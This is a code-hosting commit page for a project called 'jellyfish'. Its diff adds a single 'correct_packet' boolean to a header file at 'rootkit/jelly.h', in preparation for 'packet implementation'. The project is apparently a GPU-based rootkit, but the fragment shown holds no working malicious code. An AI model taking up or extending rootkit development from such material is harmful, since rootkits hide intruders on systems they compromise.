Projects STRLCPY jellyfish Commits 4a321893
🤬
  • get ready for packet implementation

  • Loading...
  • x0r1 committed 9 years ago
    4a321893
    1 parent e90e3815
  • ■ ■ ■ ■ ■
    rootkit/jelly.h
    skipped 31 lines
    32 32   
    33 33  // globals
    34 34  char **buffer, **buffer2, **buffer3;
     35 +bool correct_packet = FALSE;
    35 36  cl_mem log, output, input, local, group, storage;
    36 37  cl_int err;
    37 38  size_t global_size = 4;
    skipped 6 lines
Please wait...
Page is in error, reload to recover